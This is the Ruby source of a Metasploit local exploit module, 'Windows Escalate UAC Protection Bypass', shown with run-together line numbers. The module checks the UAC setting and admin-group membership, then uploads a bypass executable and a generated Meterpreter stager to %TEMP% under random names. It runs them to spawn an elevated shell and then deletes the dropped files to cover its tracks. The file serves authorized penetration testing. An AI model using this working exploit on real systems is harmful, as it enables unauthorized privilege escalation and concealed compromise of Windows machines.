Path: blob/master/modules/exploits/windows/local/bypassuac.rb
24416 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Exploit::EXE9include Post::File10include Post::Windows::Priv11include Post::Windows::Runas1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Windows Escalate UAC Protection Bypass',18'Description' => %q{19This module will bypass Windows UAC by utilizing the trusted publisher20certificate through process injection. It will spawn a second shell that21has the UAC flag turned off.22},23'License' => MSF_LICENSE,24'Author' => [25'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',26'mitnick',27'mubix' # Port to local exploit28],29'Platform' => [ 'win' ],30'SessionTypes' => [ 'meterpreter' ],31'Targets' => [32[ 'Windows x86', { 'Arch' => ARCH_X86 } ],33[ 'Windows x64', { 'Arch' => ARCH_X64 } ]34],35'DefaultTarget' => 0,36'References' => [37[ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]38],39'DisclosureDate' => '2010-12-31',40'Compat' => {41'Meterpreter' => {42'Commands' => %w[43stdapi_sys_process_kill44]45}46},47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options([56OptEnum.new('TECHNIQUE', [57true, 'Technique to use if UAC is turned off',58'EXE', %w[PSH EXE]59]),60])61end6263def check_permissions!64# Check if you are an admin65vprint_status('Checking admin status...')66admin_group = is_in_admin_group?6768if admin_group.nil?69print_error('Either whoami is not there or failed to execute')70print_error('Continuing under assumption you already checked...')71elsif admin_group72print_good('Part of Administrators group! Continuing...')73else74fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')75end7677if get_integrity_level == INTEGRITY_LEVEL_SID[:low]78fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')79end80end8182def exploit83validate_environment!8485case get_uac_level86when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT87fail_with(Failure::NotVulnerable,88"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")89when UAC_DEFAULT90print_good 'UAC is set to Default'91print_good 'BypassUAC can bypass this setting, continuing...'92when UAC_NO_PROMPT93print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"94runas_method95return96end9798check_permissions!99100upload_binaries!101102cmd = "#{path_bypass} /c #{path_payload}"103# execute the payload104pid = cmd_exec_get_pid(cmd)105106::Timeout.timeout(30) do107select(nil, nil, nil, 1) until session_created?108end109session.sys.process.kill(pid)110# delete the uac bypass payload111file_rm(path_bypass)112file_rm("#{expand_path('%TEMP%')}\\tior.exe")113cmd_exec('cmd.exe', "/c del \"#{expand_path('%TEMP%')}\\w7e*.tmp\"")114end115116def path_bypass117@path_bypass ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"118end119120def path_payload121@path_payload ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"122end123124def upload_binaries!125print_status('Uploaded the agent to the filesystem....')126#127# Generate payload and random names for upload128#129payload = generate_payload_exe130131# path to the bypassuac binary132path = ::File.join(Msf::Config.data_directory, 'post')133134bpexe = ::File.join(path, "bypassuac-#{sysinfo['Architecture'] == ARCH_X86 ? 'x86' : 'x64'}.exe")135136print_status('Uploading the bypass UAC executable to the filesystem...')137138begin139#140# Upload UAC bypass to the filesystem141#142upload_file(path_bypass.to_s, bpexe)143print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")144145write_file(path_payload, payload)146rescue ::Exception => e147print_error("Error uploading file #{path_bypass}: #{e.class} #{e}")148return149end150end151152def runas_method153case datastore['TECHNIQUE']154when 'PSH'155# execute PSH156shell_execute_psh157when 'EXE'158# execute EXE159shell_execute_exe160end161end162163def validate_environment!164fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?165#166# Verify use against Vista+167#168version = get_version_info169unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win81)170fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")171end172173if is_uac_enabled?174print_status 'UAC is Enabled, checking level...'175elsif is_in_admin_group?176fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')177else178fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')179end180end181end182183184